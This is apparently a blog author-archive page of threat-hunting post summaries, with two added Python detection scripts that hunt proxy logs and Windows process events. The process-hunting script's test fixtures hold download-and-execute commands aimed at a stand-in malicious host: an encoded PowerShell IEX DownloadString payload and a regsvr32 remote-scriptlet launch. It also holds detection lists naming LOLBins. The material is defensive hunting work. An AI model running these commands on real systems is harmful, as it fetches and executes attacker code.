Author Archives: Chris Sanders
In the first part of this series, I discussed how suspicious file types can lead to the discovery of malicious activity, and how to hunt for suspicious file types traversing your network using data sources like HTTP proxy events. In this article, I'll continue our focus on hunting for suspicious file types by examining the presence and execution of files on the host. I'll also discuss additional steps you can take to investigate suspicious file types once you've discovered them on your network or systems.
Not all attacks require the use of malware, but most of them can be traced back to some form of unwanted code executing on a trusted system. The files can be compiled executables, simple scripts, or even Office documents hiding malicious macros. While these file types are often legitimate, experienced hunters know that you can hunt for compromises by examining the download and execution of specific file types known to be associated with malware. In this post, I'll discuss a few techniques you can use to hunt on the network for file types that could be suspicious given the right context.
Attackers rely on the abstraction between domains and IP addresses to make their infrastructure more resilient. A domain name can be registered in a matter of minutes, and multiple domains can be configured to point to the same host. This allows attackers to quickly switch between domains and subdomains to avoid detection. One trick experienced hunters use is to turn the newness of these domains against the attacker and hunt for malicious activity with that in mind. In this post, I'll discuss HTTP proxy categorization and demonstrate how you can use Sqrrl to hunt for malware by focusing on previously unseen domains.
An attacker will use the minimum effort required to compromise your network. That means when it's possible to reuse existing applications, tools, and protocols, they'll do it! This is one reason why attackers so often use HTTP to facilitate communication to and from infected hosts. In this post, I'll discuss the HTTP user agent field and demonstrate how you can use Sqrrl to hunt for HTTP-based malware.
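The three hunts sketched in the file-type, previously-unseen-domain and user-agent posts above all run over the same HTTP proxy data, so the following added example (not code from the original posts or from Sqrrl) implements them together over a small set of constructed proxy log lines: it flags downloads with executable extensions or an executable content-type served under an innocuous extension, reports registered domains absent from an assumed baseline of known-good domains, and lists user agents seen from fewer hosts than a threshold. The log format, the baseline and every record are constructed for illustration.

```python
"""Hunting in HTTP proxy logs for suspicious file types, previously unseen
domains, and rare user agents.

Added example, not code from the original posts or from Sqrrl. The log format,
the baseline of known domains, and every log line below are constructed.
"""
import os
from collections import defaultdict
from urllib.parse import urlparse

UA_CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/56.0.2924.87"
UA_OLD_IE = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

# Constructed tab-separated proxy log:
# time, client, method, url, status, content-type, user-agent
PROXY_LOG = "\n".join("\t".join(f) for f in [
    ("2017-03-01T10:00:01", "10.0.0.5", "GET", "http://cdn.example.com/site.js", "200", "application/javascript", UA_CHROME),
    ("2017-03-01T10:00:03", "10.0.0.7", "GET", "http://www.example.com/index.html", "200", "text/html", UA_CHROME),
    ("2017-03-01T10:01:10", "10.0.0.5", "GET", "http://update.vendor-test.com/patch.exe", "200", "application/x-msdownload", UA_CHROME),
    ("2017-03-01T10:02:44", "10.0.0.9", "GET", "http://x7q2.dyn-host-example.net/img/logo.gif", "200", "application/x-msdownload", UA_CHROME),
    ("2017-03-01T10:02:51", "10.0.0.9", "POST", "http://x7q2.dyn-host-example.net/gate.php", "200", "text/html", UA_OLD_IE),
    ("2017-03-01T10:03:02", "10.0.0.11", "GET", "http://mail.example.com/inbox", "200", "text/html", UA_CHROME),
    ("2017-03-01T10:03:30", "10.0.0.7", "GET", "http://docs.example.com/report.doc", "200", "application/msword", UA_CHROME),
])

# Assumed baseline of registered domains already known in this environment.
BASELINE_DOMAINS = {"example.com", "vendor-test.com"}

# Extensions associated with malware delivery. .js and .doc are deliberately
# absent: they are too common in normal traffic to flag on extension alone.
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".hta", ".vbs", ".ps1", ".jar", ".msi"}
# Content-types that unambiguously denote a Windows executable. The generic
# application/octet-stream is left out because it would flag most downloads.
EXEC_CONTENT_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                      "application/vnd.microsoft.portable-executable"}


def parse_proxy_log(text):
    """Parse tab-separated proxy lines into dicts; the UA is the last field."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, ctype, ua = line.split("\t", 6)
        records.append({"ts": ts, "client": client, "method": method, "url": url,
                        "status": int(status), "content_type": ctype.lower(), "ua": ua})
    return records


def url_extension(url):
    return os.path.splitext(urlparse(url).path)[1].lower()


def suspicious_file_types(records):
    """Return (url, reason) for executable downloads and content-type mismatches."""
    hits = []
    for r in records:
        ext = url_extension(r["url"])
        if ext in EXEC_EXTENSIONS:
            hits.append((r["url"], "executable extension %s" % ext))
        elif r["content_type"] in EXEC_CONTENT_TYPES:
            # An executable served as an image or with no extension at all.
            hits.append((r["url"], "executable content-type %s served as %s"
                         % (r["content_type"], ext or "no extension")))
    return hits


def registered_domain(host):
    # Naive: last two labels. Production code needs the public suffix list
    # so that e.g. host.example.co.uk does not collapse to "co.uk".
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def new_domains(records, baseline):
    """Registered domains in the log that the baseline has never seen."""
    seen = {registered_domain(urlparse(r["url"]).hostname) for r in records}
    return seen - set(baseline)


def rare_user_agents(records, min_hosts=2):
    """User agents used by fewer than min_hosts distinct clients."""
    hosts_by_ua = defaultdict(set)
    for r in records:
        hosts_by_ua[r["ua"]].add(r["client"])
    return {ua: len(h) for ua, h in hosts_by_ua.items() if len(h) < min_hosts}


if __name__ == "__main__":
    recs = parse_proxy_log(PROXY_LOG)
    for url, reason in suspicious_file_types(recs):
        print("FILE  ", reason, url)
    for dom in sorted(new_domains(recs, BASELINE_DOMAINS)):
        print("DOMAIN previously unseen:", dom)
    for ua, n in rare_user_agents(recs).items():
        print("UA     seen from %d host(s): %s" % (n, ua))
```

On the constructed data the three hunts converge on the same client, 10.0.0.9: it downloaded a file labelled as an executable under a .gif path from a domain not in the baseline, then posted to that domain with a user agent no other host uses. That overlap is the point of running the hunts side by side; individually each is noisy on real traffic, so tune the extension list, baseline window and host threshold to your environment.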
Processes are executed on systems in a variety of ways. A process might be executed by a user double-clicking an icon, by an automated service running at startup, or by a script referencing a third-party application. While not every attack requires the use of malware, most of them do require the execution of some type of process, even if it is a legitimate process being used for nefarious purposes. In this post, I’ll discuss how hunting for command line process executions can be a useful strategy for finding evil and how Sqrrl can make finding and investigating these events easier.
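The command-line hunting described above, as an added example that is not code from the original post or from Sqrrl: a handful of rules run over constructed Windows process-creation events (parent image, image, command line) and flag an Office application spawning a shell or script host, a PowerShell command passed via the EncodedCommand switch (decoded so the analyst can read it), a binary executing from a user-writable path, and a remote URL on the command line of a signed binary that can fetch and run content. The event schema, the rules and every event are constructed; in practice the same fields come from Sysmon event ID 1, Windows event 4688 with command-line auditing enabled, or an EDR agent.

```python
"""Hunting Windows process-creation events by command line.

Added example, not code from the original post or from Sqrrl. The event
schema, the rule set and every event below are constructed for illustration.
"""
import base64
import binascii
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS_AND_SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Signed Windows binaries that will fetch and execute remote content.
REMOTE_CAPABLE_LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|users\\public|programdata)\\", re.IGNORECASE)
# -e, -ec, -enc and -encodedcommand all select PowerShell's EncodedCommand
# parameter in practice; the argument is base64 of a UTF-16LE string.
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Constructed malicious payload, encoded the way PowerShell expects it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://x7q2.dyn-host-example.net/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed process-creation events.
EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
    {"host": "WS01", "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"host": "WS02", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\bob\AppData\Local\Temp\invoice.exe",
     "command_line": r'"C:\Users\bob\AppData\Local\Temp\invoice.exe"'},
    {"host": "WS03", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://x7q2.dyn-host-example.net/s.sct scrobj.dll"},
    {"host": "WS03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(command_line):
    """Return the decoded EncodedCommand payload, or None if there is none."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def finding(ev, rule, detail):
    return {"host": ev["host"], "rule": rule, "image": basename(ev["image"]), "detail": detail}


def hunt_process_events(events):
    """Apply each rule to each event; one event may produce several findings."""
    findings = []
    for ev in events:
        parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["command_line"]
        if parent in OFFICE_PARENTS and image in SHELLS_AND_SCRIPT_HOSTS:
            findings.append(finding(ev, "office_spawns_shell", "%s -> %s" % (parent, image)))
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            findings.append(finding(ev, "encoded_powershell", decoded))
        if USER_WRITABLE.search(ev["image"]):
            findings.append(finding(ev, "user_writable_path", ev["image"]))
        if image in REMOTE_CAPABLE_LOLBINS and re.search(r"https?://", cmd, re.IGNORECASE):
            findings.append(finding(ev, "lolbin_remote_url", cmd))
    return findings


if __name__ == "__main__":
    for f in hunt_process_events(EVENTS):
        print("%s %-20s %-16s %s" % (f["host"], f["rule"], f["image"], f["detail"]))
```

Decoding the EncodedCommand argument is what turns a rule hit into an investigative lead: the decoded text exposes the download URL, which can then be pivoted into proxy logs. The user-writable-path rule is the noisiest of the four (installers and updaters legitimately run from AppData), so treat it as a pivot point rather than an alert.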
As defenders, the critical moment is when we've determined that an attacker's attempt to gain a foothold on the network was successful. This sets off a chain of investigative activity in which we follow breadcrumbs through our data to understand where the attacker went, what their mission is, and what they took. As these breadcrumbs are uncovered, we don't just follow their path; we also must ascertain whether similar evidence can be found at other points on the network. This is all part of scoping the attacker to better understand the attack. In this post, I'm going to talk about strategies for attack scoping and discuss how Sqrrl enables them intuitively.
An incident investigation will only go as far as the evidence allows. Of course, many components have to come together to make that happen. The environment must support the collection of robust and diverse evidence sources, and that evidence must be searchable by the analyst. From there, the incident investigation hinges on the ability of the analyst to ask questions, traverse the evidence to answer those questions, and draw conclusions from the findings.
Investigations are all about iterating through evidence that helps you make decisions about what events transpired on your network. That sounds easy enough, but asking the right questions and identifying the data you need to answer them is tricky. This problem manifests in two ways. First, not having enough of the right data means you may be unable to answer the questions that will move the investigation forward. Conversely, having too much data may be overwhelming with a tremendous number of fields and complementary evidence sources to examine. In either case, asking good questions and moving towards a conclusion quickly and accurately depends on knowing what data is available to you in any given scenario. In this post, I’ll address these concerns and discuss how Sqrrl helps you better understand your data so that you know where the gaps are and what options you have available to you within the context of an active investigation.
Finding evil is all about asking the right questions, finding answers, and using those answers to ask more questions. Each question and answer represents a decision point, branching the investigation off down a new path. The path of the analyst is far from linear, and sometimes we need to go back and retrace our steps to work from a previous decision point. Just like Hansel and Gretel left breadcrumbs along their path through the woods, we too need breadcrumbs to ensure that we're fully exploring our hypotheses and seeing the whole picture of an investigation clearly.